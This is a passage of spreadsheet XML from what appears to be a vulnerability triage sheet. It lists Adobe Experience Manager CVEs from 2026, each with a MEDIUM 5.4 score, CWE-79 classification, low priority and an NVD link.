      </c>
      <c r="B1963" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75675</t>
        </is>
      </c>
      <c r="C1963" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1963" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1963" s="5" t="inlineStr"/>
      <c r="F1963" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1963" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1963" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1963" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1963" s="5" t="inlineStr"/>
      <c r="K1963" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L196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63" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75675</t>
        </is>
      </c>
    </row>
    <row r="1964">
      <c r="A1964" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1964" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75677</t>
        </is>
      </c>
      <c r="C1964" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1964" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1964" s="5" t="inlineStr"/>
      <c r="F1964" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1964" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1964" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1964" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1964" s="5" t="inlineStr"/>
      <c r="K1964" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L196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64" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75677</t>
        </is>
      </c>
    </row>
    <row r="1965">
      <c r="A1965" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1965" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75678</t>
        </is>
      </c>
      <c r="C1965" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1965" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1965" s="5" t="inlineStr"/>
      <c r="F1965" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1965" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1965" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1965" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1965" s="5" t="inlineStr"/>
      <c r="K1965" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L196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65" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75678</t>
        </is>
      </c>
    </row>
    <row r="1966">
      <c r="A1966" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1966" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75679</t>
        </is>
      </c>
      <c r="C1966" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1966" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1966" s="5" t="inlineStr"/>
      <c r="F1966" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1966" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1966" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1966" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1966" s="5" t="inlineStr"/>
      <c r="K1966" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L196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66" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75679</t>
        </is>
      </c>
    </row>
    <row r="1967">
      <c r="A1967" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1967" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75680</t>
        </is>
      </c>
      <c r="C1967" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1967" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1967" s="5" t="inlineStr"/>
      <c r="F1967" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1967" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1967" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1967" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1967" s="5" t="inlineStr"/>
      <c r="K1967" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L196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67" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75680</t>
        </is>
      </c>
    </row>
    <row r="1968">
      <c r="A1968" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1968" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75681</t>
        </is>
      </c>
      <c r="C1968" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1968" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1968" s="5" t="inlineStr"/>
      <c r="F1968" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1968" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1968" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1968" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1968" s="5" t="inlineStr"/>
      <c r="K1968" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L196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68" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75681</t>
        </is>
      </c>
    </row>
    <row r="1969">
      <c r="A1969" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1969" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75683</t>
        </is>
      </c>
      <c r="C1969" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1969" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1969" s="5" t="inlineStr"/>
      <c r="F1969" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1969" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1969" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1969" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1969" s="5" t="inlineStr"/>
      <c r="K1969" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L196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69" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75683</t>
        </is>
      </c>
    </row>
    <row r="1970">
      <c r="A1970" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1970" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75685</t>
        </is>
      </c>
      <c r="C1970" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1970" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1970" s="5" t="inlineStr"/>
      <c r="F1970" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1970" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1970" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1970" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1970" s="5" t="inlineStr"/>
      <c r="K1970" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L197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70" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75685</t>
        </is>
      </c>
    </row>
    <row r="1971">
      <c r="A1971" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1971" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75687</t>
        </is>
      </c>
      <c r="C1971" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1971" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1971" s="5" t="inlineStr"/>
      <c r="F1971" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1971" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1971" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1971" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1971" s="5" t="inlineStr"/>
      <c r="K1971" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L197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71" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75687</t>
        </is>
      </c>
    </row>
    <row r="1972">
      <c r="A1972" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1972" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75690</t>
        </is>
      </c>
      <c r="C1972" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1972" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1972" s="5" t="inlineStr"/>
      <c r="F1972" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1972" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1972" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1972" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1972" s="5" t="inlineStr"/>
      <c r="K1972" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L197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72" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75690</t>
        </is>
      </c>
    </row>
    <row r="1973">
      <c r="A1973" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1973" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75691</t>
        </is>
      </c>
      <c r="C1973" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1973" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1973" s="5" t="inlineStr"/>
      <c r="F1973" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1973" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1973" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1973" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1973" s="5" t="inlineStr"/>
      <c r="K1973" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L197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73" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75691</t>
        </is>
      </c>
    </row>
    <row r="1974">
      <c r="A1974" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1974" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75692</t>
        </is>
      </c>
      <c r="C1974" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1974" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1974" s="5" t="inlineStr"/>
      <c r="F1974" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1974" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1974" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1974" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1974" s="5" t="inlineStr"/>
      <c r="K1974" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L197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74" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75692</t>
        </is>
      </c>
    </row>
    <row r="1975">
      <c r="A1975" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1975" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75693</t>
        </is>
      </c>
      <c r="C1975" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1975" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1975" s="5" t="inlineStr"/>
      <c r="F1975" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1975" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1975" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1975" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1975" s="5" t="inlineStr"/>
      <c r="K1975" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L197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75" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75693</t>
        </is>
      </c>
    </row>
    <row r="1976">
      <c r="A1976" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1976" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75694</t>
        </is>
      </c>
      <c r="C1976" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1976" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1976" s="5" t="inlineStr"/>
      <c r="F1976" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1976" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1976" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1976" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1976" s="5" t="inlineStr"/>
      <c r="K1976" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L197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76" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75694</t>
        </is>
      </c>
    </row>
    <row r="1977">
      <c r="A1977" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1977" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75695</t>
        </is>
      </c>
      <c r="C1977" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1977" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1977" s="5" t="inlineStr"/>
      <c r="F1977" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1977" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1977" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1977" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1977" s="5" t="inlineStr"/>
      <c r="K1977" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L197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77" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75695</t>
        </is>
      </c>
    </row>
    <row r="1978">
      <c r="A1978" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1978" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75696</t>
        </is>
      </c>
      <c r="C1978" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1978" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1978" s="5" t="inlineStr"/>
      <c r="F1978" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1978" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1978" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1978" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1978" s="5" t="inlineStr"/>
      <c r="K1978" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L197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78" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75696</t>
        </is>
      </c>
    </row>
    <row r="1979">
      <c r="A1979" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1979" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75700</t>
        </is>
      </c>
      <c r="C1979" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1979" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1979" s="5" t="inlineStr"/>
      <c r="F1979" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1979" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1979" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1979" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1979" s="5" t="inlineStr"/>
      <c r="K1979" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L197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79" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75700</t>
        </is>
      </c>
    </row>
    <row r="1980">
      <c r="A1980" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1980" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75701</t>
        </is>
      </c>
      <c r="C1980" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1980" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1980" s="5" t="inlineStr"/>
      <c r="F1980" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1980" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1980" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1980" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1980" s="5" t="inlineStr"/>
      <c r="K1980" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L198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80" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75701</t>
        </is>
      </c>
    </row>
    <row r="1981">
      <c r="A1981" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1981" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75702</t>
        </is>
      </c>
      <c r="C1981" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1981" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1981" s="5" t="inlineStr"/>
      <c r="F1981" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1981" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1981" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1981" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1981" s="5" t="inlineStr"/>
      <c r="K1981" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L198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81" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75702</t>
        </is>
      </c>
    </row>
    <row r="1982">
      <c r="A1982" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1982" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75704</t>
        </is>
      </c>
      <c r="C1982" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1982" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1982" s="5" t="inlineStr"/>
      <c r="F1982" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1982" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1982" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1982" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1982" s="5" t="inlineStr"/>
      <c r="K1982" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L198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82" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75704</t>
        </is>
      </c>
    </row>
    <row r="1983">
      <c r="A1983" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1983" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75705</t>
        </is>
      </c>
      <c r="C1983" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1983" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1983" s="5" t="inlineStr"/>
      <c r="F1983" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1983" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1983" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1983" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1983" s="5" t="inlineStr"/>
      <c r="K1983" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L198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83" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75705</t>
        </is>
      </c>
    </row>
    <row r="1984">
      <c r="A1984" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1984" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75706</t>
        </is>
      </c>
      <c r="C1984" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1984" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1984" s="5" t="inlineStr"/>
      <c r="F1984" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1984" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1984" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1984" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1984" s="5" t="inlineStr"/>
      <c r="K1984" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L198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84" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75706</t>
        </is>
      </c>
    </row>
    <row r="1985">
      <c r="A1985" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1985" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75707</t>
        </is>
      </c>
      <c r="C1985" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1985" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1985" s="5" t="inlineStr"/>
      <c r="F1985" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1985" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1985" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1985" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1985" s="5" t="inlineStr"/>
      <c r="K1985" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L198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85" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75707</t>
        </is>
      </c>
    </row>
    <row r="1986">
      <c r="A1986" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1986" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75708</t>
        </is>
      </c>
      <c r="C1986" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1986" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1986" s="5" t="inlineStr"/>
      <c r="F1986" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1986" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1986" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1986" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1986" s="5" t="inlineStr"/>
      <c r="K1986" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L198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86" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75708</t>
        </is>
      </c>
    </row>
    <row r="1987">
      <c r="A1987" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1987" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75709</t>
        </is>
      </c>
      <c r="C1987" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1987" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1987" s="5" t="inlineStr"/>
      <c r="F1987" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1987" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1987" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1987" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1987" s="5" t="inlineStr"/>
      <c r="K1987" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L198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87" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75709</t>
        </is>
      </c>
    </row>
    <row r="1988">
      <c r="A1988" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1988" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75710</t>
        </is>
      </c>
      <c r="C1988" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1988" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1988" s="5" t="inlineStr"/>
      <c r="F1988" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1988" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1988" s="5" t="inlineStr">
        <is>
          <t>adobe:experience_manager</t>
        </is>
      </c>
      <c r="I1988" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1988" s="5" t="inlineStr"/>
      <c r="K1988" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L198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88" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75710</t>
        </is>
      </c>
    </row>
    <row r="1989">
      <c r="A1989" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1989" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75711</t>
        </is>
      </c>
      <c r="C1989" s="5" t="n">
        <v>5.4</v>
      </c>
      <c r="D1989" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1989" s="5" t="inlineStr"/>
      <c r="F1989" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1989" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1989" s="5" t="inlineStr">
        <is>
